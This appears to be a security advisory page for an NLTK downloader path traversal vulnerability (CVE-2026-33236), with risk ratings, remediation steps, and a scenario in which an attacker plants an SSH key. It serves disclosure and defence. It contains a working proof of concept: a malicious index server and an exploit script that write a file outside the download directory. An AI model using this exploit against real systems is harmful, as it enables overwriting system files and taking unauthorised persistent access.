NLTK's downloader blindly trusts attacker-controlled XML index files, enabling arbitrary file overwrite on any machine running NLP/ML pipelines that download NLTK resources at runtime. Automated training infrastructure and CI/CD pipelines using custom index URLs face direct system file compromise—including SSH key injection and credential overwrites. Audit all NLTK deployments immediately for custom server_index_url usage, pre-bake corpora into container images to eliminate runtime downloads, and enforce egress controls blocking outbound HTTP to NLTK index servers.
Risk Assessment
High risk for organizations running NLP pipelines, training infrastructure, or shared research environments. CVSS 8.1 is justified: network-accessible, low complexity, no privileges required, and a working PoC exists. The primary exploitation constraint is attacker control of the NLTK index server—achievable via MitM on HTTP traffic, BGP/DNS hijack, or social engineering ML engineers into using malicious custom URLs. Cloud ML environments with unfiltered outbound HTTP (SageMaker, Vertex AI, Azure ML) are particularly exposed. EPSS is low (0.00043) indicating no observed exploitation yet, but the public PoC significantly lowers the barrier to entry.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| nltk | pip | <= 3.9.2 | No patch |
Do you use nltk? You're affected.
Severity & Risk
Attack Surface
Recommended Action
7 steps-
Inventory: Scan all Python environments and container images for NLTK <= 3.9.2 (
pip show nltk). -
Patch: No official patched version released as of CVE publication—monitor https://github.com/nltk/nltk for release.
-
Workaround (preferred): Pre-download all required corpora and bake into container images; disable runtime NLTK downloads in production entirely.
-
Harden: Enforce egress firewall rules blocking outbound HTTP to NLTK index servers; require HTTPS for any external data source used by ML pipelines.
-
Audit: Search codebase for
Downloader(server_index_url=with non-official URLs—treat as critical finding requiring immediate remediation. -
Sandbox: Run NLP preprocessing containers with read-only bind mounts on sensitive filesystem paths (/etc, ~/.ssh, site-packages).
-
Detect: Add FIM (file integrity monitoring) alerts for writes to /etc/passwd, ~/.ssh/authorized_keys, and Python site-packages directories by ML service accounts.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-33236?
NLTK's downloader blindly trusts attacker-controlled XML index files, enabling arbitrary file overwrite on any machine running NLP/ML pipelines that download NLTK resources at runtime. Automated training infrastructure and CI/CD pipelines using custom index URLs face direct system file compromise—including SSH key injection and credential overwrites. Audit all NLTK deployments immediately for custom server_index_url usage, pre-bake corpora into container images to eliminate runtime downloads, and enforce egress controls blocking outbound HTTP to NLTK index servers.
Is CVE-2026-33236 actively exploited?
No confirmed active exploitation of CVE-2026-33236 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-33236?
1. Inventory: Scan all Python environments and container images for NLTK <= 3.9.2 (`pip show nltk`). 2. Patch: No official patched version released as of CVE publication—monitor https://github.com/nltk/nltk for release. 3. Workaround (preferred): Pre-download all required corpora and bake into container images; disable runtime NLTK downloads in production entirely. 4. Harden: Enforce egress firewall rules blocking outbound HTTP to NLTK index servers; require HTTPS for any external data source used by ML pipelines. 5. Audit: Search codebase for `Downloader(server_index_url=` with non-official URLs—treat as critical finding requiring immediate remediation. 6. Sandbox: Run NLP preprocessing containers with read-only bind mounts on sensitive filesystem paths (/etc, ~/.ssh, site-packages). 7. Detect: Add FIM (file integrity monitoring) alerts for writes to /etc/passwd, ~/.ssh/authorized_keys, and Python site-packages directories by ML service accounts.
What systems are affected by CVE-2026-33236?
This vulnerability affects the following AI/ML architecture patterns: NLP training pipelines, data preprocessing pipelines, CI/CD ML pipelines, Jupyter notebook environments, containerized ML workloads.
What is the CVSS score for CVE-2026-33236?
CVE-2026-33236 has a CVSS v3.1 base score of 8.1 (HIGH). The EPSS exploitation probability is 0.02%.
Technical Details
NVD Description
## Vulnerability Description The NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to: 1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system 2. **Arbitrary File Creation**: Create arbitrary files 3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.) ## Vulnerability Principle ### Key Code Locations **1. XML Parsing Without Validation** (`nltk/downloader.py:253`) ```python self.filename = os.path.join(subdir, id + ext) ``` - `subdir` and `id` are directly from XML attributes without any validation **2. Path Construction Without Checks** (`nltk/downloader.py:679`) ```python filepath = os.path.join(download_dir, info.filename) ``` - Directly uses `filename` which may contain path traversal **3. Unrestricted Directory Creation** (`nltk/downloader.py:687`) ```python os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True) ``` - Can create arbitrary directories outside the download directory **4. File Writing Without Protection** (`nltk/downloader.py:695`) ```python with open(filepath, "wb") as outfile: ``` - Can write to arbitrary locations in the file system ### Attack Chain ``` 1. Attacker controls remote XML index server ↓ 2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../> ↓ 3. Victim executes: downloader.download('passwd') ↓ 4. Package.fromxml() creates object, filename = "../../etc/passwd.zip" ↓ 5. _download_package() constructs path: download_dir + "../../etc/passwd.zip" ↓ 6. os.makedirs() creates directory: download_dir + "../../etc" ↓ 7. open(filepath, "wb") writes file to /etc/passwd.zip ↓ 8. System file is overwritten! ``` ## Impact Scope 1. **System File Overwrite** ## Reproduction Steps ### Environment Setup 1. Install NLTK ```bash pip install nltk ``` 2. Prepare malicious server and exploit script (see PoC section) ### Reproduction Process **Step 1: Start malicious server** ```bash python3 malicious_server.py ``` **Step 2: Run exploit script** ```bash python3 exploit_vulnerability.py ``` **Step 3: Verify results** ```bash ls -la /tmp/test_file.zip ``` ## Proof of Concept ### Malicious Server (malicious_server.py) ```python #!/usr/bin/env python3 """Malicious HTTP Server - Provides XML index with path traversal""" import os import tempfile import zipfile from http.server import HTTPServer, BaseHTTPRequestHandler # Create temporary directory server_dir = tempfile.mkdtemp(prefix="nltk_malicious_") # Create malicious XML (contains path traversal) malicious_xml = """<?xml version="1.0"?> <nltk_data> <packages> <package id="test_file" subdir="../../../../../../../../../tmp" url="http://127.0.0.1:8888/test.zip" size="100" unzipped_size="100" unzip="0"/> </packages> </nltk_data> """ # Save files with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f: f.write(malicious_xml) with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf: zf.writestr("test.txt", "Path traversal attack!") # HTTP Handler class Handler(BaseHTTPRequestHandler): def do_GET(self): if self.path == '/malicious_index.xml': self.send_response(200) self.send_header('Content-type', 'application/xml') self.end_headers() with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f: self.wfile.write(f.read()) elif self.path == '/test.zip': self.send_response(200) self.send_header('Content-type', 'application/zip') self.end_headers() with open(os.path.join(server_dir, 'test.zip'), 'rb') as f: self.wfile.write(f.read()) else: self.send_response(404) self.end_headers() def log_message(self, format, *args): pass # Start server if __name__ == "__main__": port = 8888 server = HTTPServer(("0.0.0.0", port), Handler) print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml") print("Press Ctrl+C to stop") try: server.serve_forever() except KeyboardInterrupt: print("\nServer stopped") ``` ### Exploit Script (exploit_vulnerability.py) ```python #!/usr/bin/env python3 """AFO Vulnerability Exploit Script""" import os import tempfile def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"): download_dir = tempfile.mkdtemp(prefix="nltk_exploit_") print(f"Download directory: {download_dir}") # Exploit vulnerability from nltk.downloader import Downloader downloader = Downloader(server_index_url=server_url, download_dir=download_dir) downloader.download("test_file", quiet=True) # Check results expected_path = "/tmp/test_file.zip" if os.path.exists(expected_path): print(f"\n✗ Exploit successful! File written to: {expected_path}") print(f"✗ Path traversal attack successful!") else: print(f"\n? File not found, download may have failed") if __name__ == "__main__": exploit() ``` ### Execution Results ``` ✗ Exploit successful! File written to: /tmp/test_file.zip ✗ Path traversal attack successful! ```
Exploitation Scenario
An adversary targeting an organization's NLP training pipeline identifies that the pipeline downloads NLTK resources at runtime against an HTTP (non-TLS) index server. The adversary performs a DNS hijack or BGP prefix hijack against the NLTK data hostname, redirecting index requests to a controlled malicious server. The malicious server returns a crafted XML with subdir='../../../.ssh' and id='authorized_keys'. When the nightly training job executes `nltk.download('punkt')`, NLTK constructs the path `download_dir + '../../../.ssh/authorized_keys.zip'`, creates the directory, and writes the attacker's crafted archive. After extraction, the attacker's SSH public key is present in authorized_keys—granting persistent, passwordless access to the ML training server, which typically holds sensitive training data, model artifacts, and credentials for internal APIs and data stores.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same attack type: Supply Chain CVE-2024-2912 10.0 BentoML: RCE via insecure deserialization (CVSS 10)
Same attack type: Supply Chain CVE-2023-3765 10.0 MLflow: path traversal allows arbitrary file read
Same attack type: Supply Chain CVE-2025-5120 10.0 smolagents: sandbox escape enables unauthenticated RCE
Same attack type: Supply Chain CVE-2026-21858 10.0 n8n: Input Validation flaw enables exploitation
Same attack type: Code Execution
AI Threat Alert